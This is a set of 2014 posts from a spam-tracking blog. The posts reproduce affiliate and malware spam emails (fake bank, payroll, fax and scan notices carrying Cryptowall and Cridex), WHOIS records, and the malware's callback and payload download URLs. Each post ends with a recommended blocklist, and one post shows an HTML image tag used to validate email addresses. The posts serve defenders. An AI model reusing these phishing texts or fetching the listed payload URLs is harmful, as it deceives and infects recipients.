Dynamoo's Blog

Tuesday 5 August 2014

.us scumbag spammers strike again

This low-life scumbag spammers are the same people I wrote about here and are playing around in the scummy end of the affiliate marketing business.

The spamvertised domains are:

readcriminalsearch.us
pluscarsearch.us
bumpcredit.us
expectlowmortgage.us
citizensmedicare.us
closedfoodstorage.us

All of these are registered with fake WHOIS details:

Registrant ID:                               28B5829EB467EADA
Registrant Name:                             Colleen Fenn
Registrant Organization:                     na
Registrant Address1:                         2555 W Lawrence Ave
Registrant City:                             Chicago
Registrant State/Province:                   IL
Registrant Postal Code:                      60625
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.7739070654
Registrant Email:                            colleenfennf342@yahoo.com
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11

Originating IPs for email are:

109.201.135.21
109.201.135.35
109.201.135.47
109.201.135.108
109.201.148.11
109.201.148.24

All of these IPs are in the same 109.201.128.0/19 block allocated to:

organisation:   ORG-NE3-RIPE
org-name:       NForce Entertainment B.V.
org-type:       LIR
address:        NFOrce Entertainment BV
address:        Postbus 1142
address:        4700BC
address:        Roosendaal
address:        NETHERLANDS
phone:          +31206919299
fax-no:         +31206919409
abuse-mailbox: abuse@nforce.com
admin-c:        PT3315-RIPE
admin-c:        JH24522-RIPE
admin-c:        NFAR
tech-c:         NFTR
mnt-ref:        MNT-NFORCE
mnt-ref:        RIPE-NCC-HM-MNT
mnt-ref:        MNT-NFORCE
mnt-by:         RIPE-NCC-HM-MNT
abuse-c:        NFAB
source:         RIPE # Filtered

You might want to block the /24s or even the whole /19 belonging to these people. Up to you.

UPDATE: a second wave of spam has started from 77.93.204.105 in the Czech Republic:

organisation:   ORG-EA808-RIPE
org-name:       Exmasters.com
org-type:       OTHER
address:        Exmasters.com
address:        Milos Kalerta
address:        Fricova 1102,26301 Dobris,Czech Republic
phone:          +420 603 114414
abuse-mailbox: abuse@exmasters.com
mnt-ref:        MASTER-MNT
mnt-ref:        MASTER-MNT
mnt-by:         MASTER-MNT
admin-c:        EC6938-RIPE
tech-c:         EC6938-RIPE
abuse-c:        EC6938-RIPE
source:         RIPE # Filtered

The spamvertised sites themselves are parked on 98.124.199.1 and 98.124.198.1 (eNom). There are several hundred thousand sites parked on these servers, blocking those IPs might have unexpected consequences.

The spam emails generated do not identify the true sender, and given that the email list they are using was originally generated from a forced UNSUBSCRIBE link then I would bet that trying to unsubscribe will just lead to more spam.

Here are some examples:

From:    Background_Archives [records.archive@readcriminalsearch.us]
Date:    5 August 2014 14:22
Subject:    Hi, Your background check is available online. Notice: 1718629

Date: 05-August-2014
-----------------------------
Notice No. 1718629
-----------------------------
Attention: [redacted]

Past criminal records are now online because of new privacy laws.

Find out if your records are available online:
http://find.readcriminalsearch.us

0pt-off this request_ http://halt.readcriminalsearch.us
Av. Conselheiro Aguiar, 312 _ Pina
Recife _ PE
51011--031, Brazil
PO box: _0913

==================================================

From:    Best-AutoPrice [car.liquidation.event@pluscarsearch.us]
Date:    5 August 2014 14:12
Subject:    Hey, Summer Price Reduction on All New Vehicles. Notice: 5370643

Local Auto Notice: 5370643
*****************************************

US Car and Truck Dealer are Liquidating Auto Inventories

Shopping for a new or used car?

Now is the time to take advantage of Summer Discounted Automotive Prices:

Go Here To View what's in-stock near you: http://limited.pluscarsearch.us

Modify_your notification_preferences: http://end.pluscarsearch.us
PO Box No. 6498
PELAYO_ 80
-28004--MADRID_MADRID

==================================================

From:    Go_Triple_Score.22692335 [score.report.476@bumpcredit.us]
Date:    5 August 2014 14:04
Subject:    Re: Has Your Score Recently Changed? Update: 24174301

RE: Your TransUnion Score may have recently changed.
----------------------------------------------------.
Date: August 2014 Score Update
----------------------------------------------------.
Update # 24174301
----------------------------------------------------.

Dear [redacted],

The reason that we are reaching out to you today is to make you aware that your score may have been changed based on a number of recent transactions.

Go here now to find out how your score was affected by these updates: http://trynow.bumpcredit.us

Your Score Generation Time: 47 Seconds

Regards,
Marcie D.
2014 Score Defender

Cancel_this email_notification: http://stop.bumpcredit.us
Suite 4753-24B Moorefield Rd Johnsonville _Wellington 6037 New Zealand

==================================================

From:    HARP_Qualify.24513021 [Andrea.Casey@expectlowmortgage.us]
Date:    5 August 2014 14:51
Subject:    Fwd: HARP Program: Lower Rates May Be Available Rpt: 14579829

[redacted],

Are your home payments weighing you down?

This may be your last-chance to Re-mortgage. Lock in a low -rate today before rates rise.

Find out how you may be Eligible to lower your monthly-payment. No -registration or -login necessary.

Get competitive rates quotes from Top Lenders and Save --
http://joinnow.expectlowmortgage.us

Andrea Casey
Harp Eligibility Team

Report: 14579829

Control your_advertising status_here --- http://end.expectlowmortgage.us
or mail to:
Suite 4753-24B Moorefield Rd_Johnsonville Wellington_6037 New Zealand

==================================================

From:    enrollment_period.7469835 [future.enrollment.451@citizensmedicare.us]
Date:    5 August 2014 14:42
Subject:    Hey, Medicare Enrollment Begins Soon. Notice #17904389

Notice: Medicare Open Enrollment Starts Soon
**********************************************************

Medicare Recipient: [redacted]

Open Enrollment for 2015 Medicare Programs begins October 15, 2014 to December 7, 2014.

You can only change your Medicare or Prescription Drug plan during this Annual Election Period. .

Find the best, most affordable Medicare plan.

**Aetna, Humana, BlueCross, AARP and more**

Don't Miss Your Chance to Change Plans. Find the Best Plan & Save up to 40% Online: http://reservenow.citizensmedicare.us

Notice: 17904389

Opt-off this request: http://leave.citizensmedicare.us
Dundrum Town Centre,Dundrum
Dublin 16, Ireland
PO Box, No. 309

==================================================

From:    ASOTV-MrLid.11390255 [organized.mr.lid@closedfoodstorage.us]
Date:    5 August 2014 15:06
Subject:    Hey, The only food storage container of its kind ID: 16462768

==================================================

From:    Best-AutoPrice [car.liquidation.event@car-truck-searches01.us]
Date:    5 August 2014 15:42
Subject:    Hey, Summer Price Reduction on All New Vehicles. Notice: 21892282

Local Auto Notice: 21892282
*****************************************

US Car and Truck Dealer are Liquidating Auto Inventories

Shopping for a new or used car?

Now is the time to take advantage of Summer Discounted Automotive Prices:

Go Here To View what's in-stock near you: http://start.car-truck-searches01.us

Modify_your notification_preferences: http://stop.car-truck-searches01.us
PO Box No. 6498
PELAYO_ 80
-28004--MADRID_MADRID

When you follow the clickthroughs you can see the the victim is being bounced around what in my opinion look like several very low quality ad networks.

http://find.readcriminalsearch.us/
http://navytrkn.com/?a=125&c=9034&s1=nf805
http://genetix420.com/?a=125&c=9034&s1=nf805&ckmguid=7aba1f24-2e05-4757-a6cf-f288466d0695
http://www.enzjptkr.com/rd/r.php?sid=6389&pub=201700&c1=&c2=&c3=
http://affiliate.gwmtracker.com/rd/r.php?sid=6389&pub=201700&c1=&c2=&c3=
http://valuedealshopper.com?subid1=200001&subid2=6389

http://limited.pluscarsearch.us/
http://affiliate.adgtracker.com/rd/r.php?sid=6358&pub=331259&c1=nf805
http://www.auto-price-finder.com/welcome?id=544&subid=273567460&affid=331259&depid=
http://pixel.autoaffiliatenetwork.com/d/?id=544&dest=apf&landing=nonbrand&rh=www.auto-price-finder.com&c1=
http://www.auto-price-finder.com/new/car?dest=apf&landing=nonbrand&amp=&c1=&rh=www.auto-price-finder.com&id=544&li=3&alt_exp=new&alt_ab=&rd=1
http://www.auto-price-finder.com/new/car_non_branded?c1=&land=y

http://trynow.bumpcredit.us/
http://network.adsmarket.com/click/jmZsmWOdqZmKaWmZYMp6w4iQap1koX-Vi2KYmmKhg5qJkHKcYKR7w49icZVinA?dp=nf805

http://joinnow.expectlowmortgage.us/
http://silvertrkn.com/?a=125&c=7570&s1=nf805
http://genetix420.com/?a=125&c=7570&s1=nf805&ckmguid=c7633716-4790-4104-ac97-5360ffa8f1c1
http://www.enzjptkr.com/rd/r.php?sid=6389&pub=201700&c1=&c2=&c3=
http://affiliate.gwmtracker.com/rd/r.php?sid=6389&pub=201700&c1=&c2=&c3=
http://valuedealshopper.com?subid1=200001&subid2=6389

http://reservenow.citizensmedicare.us/
http://affiliate.adgtracker.com/rd/r.php?sid=7748&pub=331259&c1=nf805
http://www.medicare-providers.net/plans/index.php?Referrer=FM&Subreferrer=331259&Subid=273569127&utm_source=flex&utm_medium=email&utm_content=medicare&utm_campaign=24560

http://requestnow.closedfoodstorage.us/
http://affiliate.adgtracker.com/rd/r.php?sid=6396&pub=331259&c1=nf805
http://comperz.com/click.ashx?CID=243834&AFID=156909&SID=273569713&AffiliateReferenceID=331259
http://www.vacationrome.net?subid=243834

http://start.car-truck-searches01.us/
http://affiliate.adgtracker.com/rd/r.php?sid=6358&pub=331259&c1=exm80
http://www.auto-price-finder.com/welcome?id=544&subid=273575551&affid=331259&depid=
http://pixel.autoaffiliatenetwork.com/d/?id=544&dest=apf&landing=nonbrand&rh=www.auto-price-finder.com&c1=
http://www.auto-price-finder.com/new/car?dest=apf&landing=nonbrand&amp=&c1=&rh=www.auto-price-finder.com&id=544&li=3&alt_exp=new&alt_ab=&rd=1
http://www.auto-price-finder.com/new/car_non_branded?c1=&land=y

I'm not accusing the affiliate networks involved of soliciting sales through spam, but these are a lit of all the domains in use in case you want to do something with them:

affiliate.adgtracker.com
affiliate.gwmtracker.com
comperz.com
find.readcriminalsearch.us
genetix420.com
joinnow.expectlowmortgage.us
limited.pluscarsearch.us
navytrkn.com
network.adsmarket.com
pixel.autoaffiliatenetwork.com
requestnow.closedfoodstorage.us
reservenow.citizensmedicare.us
silvertrkn.com
start.car-truck-searches01.us
trynow.bumpcredit.us
valuedealshopper.com
www.auto-price-finder.com
www.enzjptkr.com
www.medicare-providers.net
www.vacationrome.net

"Invoice 20146308660 June 2014 - July 2014" spam

This summary is not available. Please click here to view the post.

Monday 4 August 2014

Bank of America "Important Documents" spam leads to Cryptowall

This fake BofA spam has a malicious payload:

Date:     Mon, 4 Aug 2014 19:57:07 +0800 [07:57:07 EDT]
From:     Andrea Talbot [Andrea.Talbot@bofa.com]
Subject:     RE: Important Documents

Please check attached documents regarding your Bofa account.

Andrea Talbot
Bank Of America
817-298-4679 office
817-180-2340 cell Andrea.Talbot@bofa.com

CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are
confidential and are intended solely for the use of the person or entity to whom the
message was addressed. If you are not the intended recipient of this message, please be
advised that any dissemination, distribution, or use of the contents of this message is
strictly prohibited. If you received this message in error, please notify the sender.
Please also permanently delete all copies of the original message and any attached

Attached to the message is an archive AccountDocuments.zip which in turn contains the malicious executable AccountDocuments.scr which has a VirusTotal detection rate of 6/54 and the comments indicate that this is a variant of Cryptowall. The Comodo CAMAS report shows that it phones home to the following URLs:

94.23.247.202/0408cnet28/SANDBOXB/0/51-SP2/0/
94.23.247.202/0408cnet28/SANDBOXB/1/0/0/
dirbeen.com/khalid53/cnet28.zip
ibuildchoppers.com/wp-content/gallery/choppers/cnet28.zip

Recommended blocklist:
94.23.247.202
dirbeen.com
ibuildchoppers.com

"Invoice 2014080420" spam

This spam has a malicious attachment:

Date:     Mon, 04 Aug 2014 20:29:43 +0900 [07:29:43 EDT]
From:     Accounts Dept [tolvan.rover@btinternet.com]
Subject:     Invoice 2014080420 dynamoo

This email contains an invoice file for June 2014 - July 2014. Please pay invoice in full in 3 business days and reply to us.

There is an attachment INV_2014080420.zip containing a folder invoice_june2014-july2014.xls which in turn contains a malicious executable invoice_june2014-july2014.xls.scr which has a VirusTotal detection rate of 6/52. Automated analysis tools are inconclusive [1] [2] about what it does.

UPDATE:
The first part downloads a copy of Cridex from 23.92.84.52:8080/ord/1.exe which currently has a VT detection rate of 9/54. Blocking 23.92.84.52 may offer some protection.

"Important - BT Digital File" spam

This fake BT spam has a malicious attachment:

Date:     Mon, 4 Aug 2014 08:48:51 -0430 [09:18:51 EDT]
From:     Marci Tobin
Subject:     Important - BT Digital File

BT Digital Vault     BT

Dear Customer,

This email contains your BT Digital File. Please scan attached file and reply to this email.

If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt.com/personal/digitalvault/help or call the helpdesk on 0870 240 7221* between 8am and midnight.

Thank you for choosing BT Digital Vault.

Kind regards,
BT Digital Vault Team
footer

*Calls charged up to 8 pence per minute on the BT network (minimum fee 5.5p). Mobile and other network costs may vary. See http://www.bt.com/pricing for details.

Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address.

This electronic message contains information from British Telecommunications plc, which may be privileged or confidential. The information is intended for use only by the individual(s) or entity named above. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of the contents of this information is strictly prohibited. If you have received this electronic message in error, please delete this email immediately.

Registered office: 81 Newgate Street London EC1A 7AJ Registered in England no: 1800000

The attachment is BT_Digital_Vault_File.zip which contains a malicious executable BT_Digital_Vault_File.exe which has a VirusTotal detection rate of 5/54. According to the Comodo CAMAS report the malware reaches out to the following URLs:

94.23.247.202/0408choUK2/SANDBOXB/0/51-SP2/0/
94.23.247.202/0408choUK2/SANDBOXB/1/0/0/
94.23.247.202/0408heap/SANDBOXB/1/0/0/
94.23.247.202/0408preb04/SANDBOXB/1/0/0/
amhzconsultancy.com/wordpress/48u2.zip
sintesismark.com/images/48u2.zip
bianconeandwilinsky.com/wp-content/uploads/2013/02/h8i3.zip
osteoarthritisblog.com/wp-content/uploads/2010/02/h8i3.zip
hopeisnull.comuf.com/wp-content/uploads/2014/03/pre.zip
grenzland-classic.de/css/pre.zip

Recommended blocklist:
94.23.247.202
amhzconsultancy.com
sintesismark.com
bianconeandwilinsky.com
osteoarthritisblog.com
hopeisnull.comuf.com
grenzland-classic.de

UPDATE: the following spam also has the same payload..

Date:     Mon, 4 Aug 2014 11:41:18 +0000 [07:41:18 EDT]
From:     Companies House [WebFiling@companieshouse.gov.uk]
Subject:     Incident 7132163 - Companies House

The submission number is: 7132163

For more details please check attached file.

Please quote this number in any communications with Companies House.

All Web Filed documents are available to view / download for 10 days after their
original submission. However it is not possible to view copies of accounts that
were downloaded as templates.

Companies House Executive Agency may use information it holds to prevent
and detect fraud. We may also share such information, for the same purpose,
with other Organizations that handle public funds.

If you have any queries please contact the Companies House Contact Centre
on +44 (0)303 1234 500 or email enquiries@companies-house.gov.uK

Note: This email was sent from a notification-only email address which cannot
accept incoming email. Please do not reply directly to this message.

Companies House
4 Abbey Orchard Street
Westminster
London
SW1P 2HT
Tel +44 (0)303 1234 500

"Sup" snowshoe spam from 208.71.174.32/27

Here's a strange spam I've been tracking for a couple of days:

Date:     Sun, 03 Aug 2014 20:56:48 -0700 [08/03/14 23:56:48 EDT]
From:     Olive [olive@platesat.us]
Subject:     Sup

The HTML in the body text reads:

<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="content-type">
<meta http-equiv="Content-Language" content="en-us"/>
</head>
<body>
<img src="http://www.gonename.us/unsubscribe.php?email=[redacted]">
</body>
</html>

The "IMG" is invalid and shows a placeholder.. making you think that it is broken, but in fact it is triggering the "unsubscribe" link in the email. So.. the email automatically unsubscribes its victims? No exactly.

A look at the root directory of www.gonename.us (143.95.38.234 = petyrbaelish.asmallorange.com) shows the inner workings of the spam:

The presence of unsubscribe.dat and unsubscribe.php is a characteristic of Maxprog MaxBulk Mailer which like all mailing list applications can be used for good or evil. MaxBulk Mailer does have an unsubscribe option which stores names the unsubsribe.dat file (hardly secure, I know), and what appears to be happening in this case is the the HTML has been altered slightly to make everyone unsubscribe.

Finnell's Corollary to the Rules of Spam states that spammers define "remove" as "validate which is exactly what is happening here.. when someone opens the email (if their email displays images) then it automatically confirms that they have opened it. A crude but effective way of confirming that the email address is valid.

At the time of writing, over 6800 email addresses have been validated for further spamming, a number that is increasing quite rapidly. Emails are held in plaintext and can be harvested by anyone.

****@test.com
********@freeuk.com
******@herregodts.com
******@mt.net.mk
*****@sabbangroup.com
************@solways.com.au
****@fundesigner.info
*********@lycos.co.kr
******@henryhunt.co.uk
*************@killingjoke.fr
*****@rlcfl.org
**********@sg-creation.com
**@rafting-experience.com
****@virtualinfosys.us
*********@heinemann-it.com
*****@intfalconer.net
****@intfalconer.net
***@de-laxdesigndomestic.com
***@hs-furtwangen.de
*********@ben-plastic.com
***********@rapidrepairs.biz
******@naver.com
****@ajuda.org.uk
****@hostcolor.com
*****@kiteworks.co.uk
********@rocketcreative.co.uk
*******@mw-telecom.com
****@hjtherapy.co.uk
******@viralbamboo.com

No doubt the people who opened this email can look forward to a whole set of additonal spam in their inboxes.

All the sending IPs are in the 208.71.174.32/27 range (Network Data Center Host Inc, US). Each IP has a .us domain hosted on it, but the WHOIS details for each domain appear to be fake.

This attack started last week with a different range of sending addresses in the 188.165.94.176/28 (OVH, France / VertVPS, Canada) range sending victims to a spamvertised site of www.morehex.us which was configured in the same way. All those sites have now been suspended. Email subjects in that case were:
What's up?
Hey Sister
G'day

Whoever is running these spam servers has taken enormous pains to hide their identity, and they are also well-resourced enough to be able to rent server farms for a short period until they get terminated.

I've seen the following domains and IPs in the spam I have received myself, no doubt there are other domains and IPs too.

IP	Domain	Type	Contact	Contact email
5.254.115.198	autofinder-low.us	Email	Laurs Finch	laursfinchk995@yahoo.com
174.140.162.115	indeed-removefats.com	Email	Oli Brooker	olibrooker732@yahoo.com
174.140.162.116	top-auto-locator.com	Email	Oli Brooker	olibrooker732@yahoo.com
174.140.162.119	improvekitchen-cabinet-repair.com	Email	Oli Brooker	olibrooker732@yahoo.com
174.140.162.120	tried-protectivecoats.com	Email	Oli Brooker	olibrooker732@yahoo.com
174.140.162.123	active-timeshares-sells.com	Email	Oli Brooker	olibrooker732@yahoo.com
174.140.162.124	proposed-lifeinsurance.com	Email	Lynne Dargle	lynnedargle786@yahoo.com
174.140.162.125	low-mortgage-quotes-own.com	Email	Lynne Dargle	lynnedargle786@yahoo.com
174.140.162.126	immediately-findwindows.com	Email	Lynne Dargle	lynnedargle786@yahoo.com
188.165.94.189	belly-fats-reducerhuge.com	Email	Oli Brooker	olibrooker732@yahoo.com
208.71.174.35	liegewalk.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.36	scrapehold.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.37	teasesat.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.38	cutecrane.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.39	milkfame.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.40	faintwalk.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.41	moussehold.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.42	platesat.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.43	awaycrane.us	Email	Chere Danes	cheredanes736@yahoo.com
208.71.174.44	flapfame.us	Email	Chere Danes	cheredanes736@yahoo.com
143.95.38.234	gonename.us	Web	Kristie Fisher	kristiefisher103@yahoo.com
143.95.32.129	morehex.us	Web	Helena Hodgson	helenahodgson177@yahoo.com

Looking more deeply into the /27 also yields some more domains, all of which have fake or anonymous WHOIS details:

dormsuper.com
szqe36.dormsuper.com
liegewalk.us
quality-reducer-bodyfats.us
scrapehold.us
its-find-autofinder.us
teasesat.us
better-bathtubs-deals.us
cutecrane.us
trust-profilescheck.us
milkfame.us
on-kitchen-cabinet-repair.us
faintwalk.us
myinstant-files-review.us
moussehold.us
oil-changecoupons-detail.us
platesat.us
hair-regrow-completed.us
awaycrane.us
learned-sells-timeshare.us
flapfame.us
easy-directview-package.us
boatscast.com
rpcu46.boatscast.com
submit.boatscast.com

Recommended blocklist:
208.71.174.32/27
gonename.us

Saturday 2 August 2014

Warning: ipma2014.org (Institute of Project Management America)

Just a quick note to say that if you see an email referring to the site ipma2014.org then this is a new domain for the so-called Institute of Project Management America. Beware.

It is NOT related to the 28th IPMA World Congress which uses the domain ipma2014.com or any other legitimate professional organisation. You can read my research on the activities of the people behind this outfit here.

Friday 1 August 2014

"Corporate eFax message from "unknown" - 3 page(s)" spam

This somewhat mangled spam has a malicious attachment:

Date:     Fri, 1 Aug 2014 09:45:45 -0700 [12:45:45 EDT]
From:     eFax Corporate [message@inbound.efax.com]
Subject:     Corporate eFax message from "unknown" - 3 page(s)

You have received a 3 page fax             at 2014-08-01 10:55:05. * The
reference number for this fax is p2_did1-4724072401-8195088665-159.       Thank you for
using the eFax Corporate service!        2014 j2 Global, Inc. All rights reserved. eFax
Corporate is a registered trademark of j2 Global, Inc. This account is subject to the
terms listed in the         eFax Corporate Customer Agreement.

Attached is an archive file Fax_912_391233111_941.zip which in turn contains a malicious executable Fax_912_391233111_941.scr which has a VirusTotal detection rate of 10/54.

The Comodo CAMAS report shows the malware reaching out to the following locations:

94.23.247.202/0108us1/SANDBOXA/0/51-SP2/0/
94.23.247.202/0108us1/SANDBOXA/1/0/0/
theyungdrungbon.com/wp-includes/images/0108us1.zip
101romanticcheapdates.com/wp-includes/images/0108us1.zip

Recommended blocklist:
94.23.247.202
theyungdrungbon.com
101romanticcheapdates.com

"Payroll Received by Intuit" spam / Cryptowall

I haven't seen any fake Intuit spam for a while. This one comes with a malicious attachment:

Date:     Fri, 1 Aug 2014 07:59:12 -0600 [09:59:12 EDT]
From:     Intuit Payroll Services [IntuitPayrollServices@payrollservices.intuit.com]
Subject:     Payroll Received by Intuit

Dear, [redacted]
We received your payroll on August 01, 2014 at 09:01 AM EST.

Attached is a copy of your Remittance. Please click on the attachment in order to view it.

Please note the deadlines and status instructions below: If your payroll is received
BEFORE 5 p.m., your Direct Deposit employees will be paid two (2) banking days from the
date received or on your paycheck date, whichever is later. If your payroll is received
AFTER 5 p.m., your employees will be paid three (3) banking days from the date received
or on your paycheck date, whichever is later. YOUR BANK ACCOUNT WILL BE DEBITED THE DAY
BEFORE YOUR CHECKDATE. Funds are typically withdrawn before normal banking hours so
please make sure you have sufficient funds available by 12 a.m. on the date funds are to
be withdrawn. Intuit must receive your payroll by 5 p.m., two banking days before your
paycheck date or your employees will not be paid on time. Intuit does not process
payrolls on weekends or federal banking holidays. A list of federal banking holidays can
be viewed at the Federal Reserve website. Thank you for your business.

Sincerely, Intuit Payroll Services

IMPORTANT NOTICE: This notification is being sent to inform you of a critical matter
concerning your current service, software, or billing. Please note that if you previously
opted out of receiving marketing materials from Intuit, you may continue to receive
notifications similar to this communication that affect your service or software. If you
have any questions or comments about this email, please DO NOT REPLY to this email. If
you need additional information please contact us.

If you receive an email message that appears to come from Intuit but that you suspect is
a phishing email, please forward it to immediately to spoof@intuit.com. © 2014 Intuit
Inc. All rights reserved. Intuit and the Intuit Logo are registered trademarks and/or
registered service marks of Intuit Inc. in the United States and other countries. All
other marks are the property of their respective owners, should be treated as such, and
may be registered in various jurisdictions.

Intuit Inc. Customer Communications
2800 E. Commerce Center Place, Tucson, AZ 85706

The attachment in this case is called Remittance.zip and it contains a malicious executable Remittance.exe which has a VirusTotal detection rate of 9/53.

According to the evidence of this very detailed ThreatTrack report [pdf], this is a version of Cryptowall. It makes network connections to various sites including the now-familiar 94.23.247.202.

I recommend that you block the following domains and IPs:
94.23.247.202
theothersmag.com
poroshenkogitler.com
kpai7ycr7jxqkilp.onion2web.com

New York City Police "Homicide Suspect" spam using goo.gl shortener to spread malware

The bad guys are enjoying the goo.gl URL shortening service at the moment (remember, you can report goo.gl spam to goo.gl/spam-report). This spam is slightly unusual..

From:    ALERT@nyc.gov [ALERT@static-23-106-230-77.ipcom.comunitel.net]
Date:    1 August 2014 10:43
Subject:    Homicide Suspect

Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-10078
Bulletin Author: BARILLAS #9075
Sending User #: 94265
APBnet Version: 287320

The bulletin is a pdf file. To download please follow the link below (Google Disk Drive service):

https://goo.gl/RwNKEA

The Adobe Reader (from Adobe.com) will display and print the bulletin best.

You can Not reply to the bulletin by clicking on the Reply button in your email software.

The link in the email is goo.gl/RwNKEA which goes to unionlawgroup.com/wp-content/images/Documents-43632.zip which is exactly the same payload as used in this spam.

Adding a "+" to the end of the URL reveals the click statistics

Blocking unionlawgroup.com is probably a good idea.

NatWest "You have a new Secure Message" spam uses goo.gl links to spread malware

This fake NatWest bank message uses the Goo.gl URL shortener to spread malware:

From:    NatWest [secure.message@natwest.com]
Date:    24 July 2014 10:39
Subject:    You have a new Secure Message

You have received a secure message from NatWest Bank

To read your secure message please click here. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
If you have concerns about the validity of this message, contact the sender directly.

First time users - will need to register after opening the attachment.
Help - https://securemail.natwest.com/websafe/ml/help?topic=RegEnvelope

The link in the email goes to goo.gl/dGDi7l and the downloads a ZIP file from berkleyequine.com/wp-includes/images/Documents-43632.zip, containing a malicious executable Documents-43632.scr which has a VirusTotal detection rate of just 1/54. The CAMAS report shows that the malware calls out to the following URLs;

94.23.247.202/0108uk1/SANDBOXA/0/51-SP2/0/
94.23.247.202/0108uk1/SANDBOXA/1/0/0/
94.23.247.202/0108hk1/SANDBOXA/1/0/0/
94.23.247.202/0108ok1/SANDBOXA/1/0/0/
acanthe.be/css/01u1.rar
dirbeen.com/misc/01u1.rar
porfintengoweb.com/css/heap_61_id3.rar
sso-unidadfinanzas.com/images/heap_61_id3.rar
theothersmag.com/covers/opened.rar
firstfiresystems.com/css/slimbox/opened.rar

The characteristics of this malware are very similar to this one seen yesterday, and you can be assured that there are other goo.gl URLs and download locations in addition to the one listed here.

Because you can see the stats for any goo.gl URL just by adding a "+" on the end, it is possible to see who is clicking through. Oddly, there is not a single clickthrough from the UK where the NatWest bank is actually based.

Google don't make it easy to report spammy links and they are awfully slow to respond to reports, but their reporting form is at goo.gl/spam-report if you want to try it (I would recommend giving it a go).

Recommended blocklist:
94.23.247.202
acanthe.be
dirbeen.com
porfintengoweb.com
sso-unidadfinanzas.com
theothersmag.com
firstfiresystems.com
berkleyequine.com

Thursday 31 July 2014

"Scanned Image from a Xerox WorkCentre" spam

This is a thoroughly old school spam with a malicious attachment.

Date:     Thu, 31 Jul 2014 18:16:08 +0000 [14:16:08 EDT]
From:     Local Scan [scan.614@victimdomain]
Subject:     Scanned Image from a Xerox WorkCentre

You have a received a new image from Xerox WorkCentre.

Sent by: victimdomain
Number of Images: 5
Attachment File Type: ZIP [PDF]

WorkCentre Pro Location: Machine location not set
Device Name: victimdomain

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/

Guess what.. it isn't an image at all, but a ZIP file with the unusual name of Image_[_var=partorderb].zip which contain a malicious executable Image_07312014.scr, scoring a measly 1/54 at VirusTotal.

The Comodo CAMAS report shows that the malware downloads components from the following locations:

94.23.247.202/3107us2/SANDBOXA/0/51-SP2/0/
94.23.247.202/3107us2/SANDBOXA/1/0/0/
94.23.247.202/3107h2/SANDBOXA/1/0/0/
94.23.247.202/3107op2/SANDBOXA/1/0/0/
globe-runners.com/fichier_pdf/31u2.zip
lucantaru.it/docs/31u2.zip
mediamaster-2000.de/img/heap.zip
ig-engenharia.com/wp-content/uploads/2014/02/heap.zip
upscalebeauty.com/img/colors/teal/opened.zip
lagrimas.tuars.com/css/opened.zip

There are some further clues in the VirusTotal comments as to what the malware does. Sophos has also seen the 94.23.247.202 (OVH, France) IP before.

Recommended blocklist:
94.23.247.202
globe-runners.com
lucantaru.it
mediamaster-2000.de
ig-engenharia.com
upscalebeauty.com
lagrimas.tuars.com

Evernote "File has been sent" spam

I've never understood Evernote. Something to do with elephants I think. But this spam isn't from them anyway..

Date:     Thu, 31 Jul 2014 12:26:53 +0200 [06:26:53 EDT]
From:     EVERNOTE [lcresknpwz@business.telecomitalia.it]
Subject:     File has been sent [redacted]

DSC_9426679.jpg attached to the letter
Copyright 2014 Evernote Corporation. All rights reserved

The file attached is actually DSC_9426679.zip and not .jpg, containing a malicious executable DSC_8832966.exe with a VirusTotal detection rate of 7/53. The CAMAS report shows that the malware attempts to download an additional component from the following locations:

utilatas.com/333
sdi-ppe.com/333
shahlon.com/333
croydonsog.org/333
pc2print.co.uk/333
geo.num.edu.mn/333
hendredestate.co.uk/333
kelias.com/~anonimas/333
168.144.179.82/333
alperacarli.com/333
thecolabnetwork.com/333
www.deltaplus.com.sg/333
george-bergsig.co.za/333
qatthailand.com/333
deltaplus.com.sg/333
elegantscreens.com/333
drkeithrix.co.uk/333
w3stest.webuda.com/333
www.divine-paradise.com/333
www.langrace.com/333
avengingarden.com/333

These download locations are the same as yesterday's Amazon spam run. The downloaded file has a VT detection rate of 3/53.

The recommended blocklist is the same as yesterday.

"New fax" spam using goo.gl shortening service

Here are a couple of variations of a fax spam using the goo.gl shortening service:

From:    Fax [fax@victimdomain]
Date:    31 July 2014 11:23
Subject:    You've received a new fax

New fax at SCAN5735232 from EPSON by https://victimdomain
Scan date: Thu, 31 Jul 2014 19:23:11 +0900
Number of pages: 2
Resolution: 400x400 DPI

You can download your fax message at:

https://goo.gl/1rBYjl

(Google Disk Drive is a file hosting service operated by Google, Inc.)

------------------------------

From:    FAX [fax@qcom.co.uk]
Reply-to:    FAX [fax@qcom.co.uk]
fax@localhost
Date:    31 July 2014 10:53
Subject:    You have received a new fax message

You have received fax from EPS76185555 at victimdomain
Scan date: Thu, 31 Jul 2014 16:53:10 +0700
Number of page(s): 2
Resolution: 400x400 DPI

Download file at google disk drive service - dropbox.

https://goo.gl/t8jteI

_________________________________
File is scanned image in PDF format.
Adobe(A) Reader(R) can be downloaded from the following URL: https://www.adobe.com/

There seems to be an uptick of goo.gl spam.. if you receive something like this you can report it to goo.gl/spam-report as malware.

I've seen three different URLs:
goo.gl/1rBYjl
goo.gl/t8jteI
goo.gl/RmGnbr

These lead to the following download locations:
pinkfeatherproductions.com/wp-content/uploads/2014/06/Document-95722.zip
autoescuelajoaquin.com/images/Document-95722.zip
esys-comm.ro/images/Document-95722.zip

